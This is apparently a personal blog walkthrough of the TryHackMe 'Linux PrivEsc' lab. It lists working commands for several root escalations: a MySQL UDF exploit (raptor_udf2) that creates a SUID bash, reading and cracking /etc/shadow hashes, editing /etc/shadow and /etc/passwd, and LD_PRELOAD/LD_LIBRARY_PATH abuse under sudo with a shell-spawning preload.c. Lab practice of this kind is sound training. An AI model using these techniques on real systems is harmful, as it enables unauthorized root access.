🌔

TryHackMe - Linux PrivEsc

Feb 23, 20246 min read

Room: https://tryhackme.com/room/linuxprivesc

Before I started with the exercises 

export TERM=tmux-256color
# nicer shell shortcuts

Task 1: Literally just log in

~ ssh user@10.10.xxx.xxx -oHostKeyAlgorithms=+ssh-rsa
# password: password321
# the ip could be different so type them according to the Active Machine info
 
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)

Task 2: MySQL UDF exploit

The MySQL service is running as root and the “root” user for the service does not have a password assigned. We can use a popular exploit that takes advantage of User Defined Functions (UDFs) to run system commands as root via the MySQL service.

”Popular exploit”

Hookay, so first we start with a UDF function exploit in MySQL that leads to a privesc, the exploit is so old they didn’t even assign CVE number to it. Was like, 2006 or something according to exploit-db.com

They already have all the tools in the ~/tools folder, so let’s just go ahead and jump into it.

cd ~/tools/mysql-udf
 
#compiling the exploit source with gcc
gcc -g -c raptor_udf2.c -fPIC
 
#create the shared library (so)
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Next, we connect to MySQL ass root account with a blank password

mysql -u root

Then I gotta do these commands on the MySQL shell to, quote:

[…] create a User Defined Function (UDF) “do_system” using our compiled exploit:

use mysql;
 
create table foo(line blob);
 
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
 
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
 
create function do_system returns integer soname 'raptor_udf2.so';

Copy /bin/bash to tmp and set SUID to it.

select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

Alright, after that it’s a simple matter of /tmp/rootbash -p and you are now root.

They say to remove the file though, awww :(

# rm /tmp/rootbash; exit

Task 3: Readable /etc/shadow

cat /etc/shadow
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
daemon:*:17298:0:99999:7:::
bin:*:17298:0:99999:7:::
[...]
libuuid:!:17298:0:99999:7:::
Debian-exim:!:17298:0:99999:7:::
sshd:*:17298:0:99999:7:::
user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
statd:*:17299:0:99999:7:::
mysql:!:18133:0:99999:7:::

And now we have to crack hashes, great.

Firing up Kali Linux VM and using John the Ripper, you’ll be able to recover the plain text password and its hash type, it’s…

Tip

The rockyou.txt usually sits in /usr/share/wordlists/rockyou.txt.gz, decompress it using gzip gzip -d rockyou.txt.gz

Note that gzip also decompress it inside /usr/share/wordlists, you might want to copy the file and extract it elsewhere. Otherwise it’d be a little messy, and gzip will ask for sudo

Task 4+5: /etc/shadow & /etc/passwd

It’s simple, login as root, generate a new password, and replace it

~ su
Password: #find it yourself!!!!
 
mkpasswd -m sha-512 newpasswordhere
# [output of the new password]
# Then replace it using nano
# I don't have to teach you how to modify a file too, right....?

The root password is now newpasswordhere

Pass that password through openssl to get a hash openssl passwd newpasswordhere, the replace the x in /etc/passwd of root user. You also have to create another root user named newroot.

Copying the root’s line and paste it to a new line, replace the name to newroot. Voila.

Then login with the same password as above. su newroot

Task 6: Sudo - Shell Escape Sequences

We’re gonna use GTFOBins) for the next task(s)?

If the program is listed with “sudo” as a function, you can use it to elevate privileges, usually via an escape sequence.

Q: How many programs is “user” allowed to run via sudo? A: A heck lot!! run sudo -l yourself and find out!

Task 7: Sudo - Environment Variables

Quote from this task

Sudo can be configured to inherit certain environment variables from the user’s environment. Check which environment variables are inherited (look for the env_keep options):

sudo -l

That seems correct.

Quote

  • LD_PRELOAD loads a shared object before any others when a program is run.
  • LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.

There’re a few writeups and articles about this lying around. I’m just gonna link some hereif you’re interested:

Create a shared object using the code located at /home/user/tools/sudo/preload.c:

~ gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c

preload.c content

#include <stdio.h>

include <sys/types.h> #include <stdlib.h>

void _init() { unsetenv(“LD_PRELOAD”); setresuid(0,0,0); system(“/bin/bash -p”); }

I think I wrote something about the -PIC flag up there. So I’m not gonna explain them here. Just follow the instruction.

After that, just sudo LD_PRELOAD=/tmp/preload.so program-name-here and get a program from the list of stuff that has sudo capability from sudo -l from above. We should have a root shell.

Run ldd against the apache2 program file to see which shared libraries are used by the program:

ldd /usr/sbin/apache2

Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library_path.c:

~ gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c

Run apache2 using sudo, while settings the LD_LIBRARY_PATH environment variable to /tmp (where we output the compiled shared object):

~ sudo LD_LIBRARY_PATH=/tmp apache2

A root shell should spawn.

The question at the bottom

Try renaming /tmp/libcrypt.so.1 to the name of another library used by apache2 and re-run apache2 using sudo again. Did it work? If not, try to figure out why not, and how the library_path.c code could be changed to make it work.

Search

SearchSearch

Graph View

Backlinks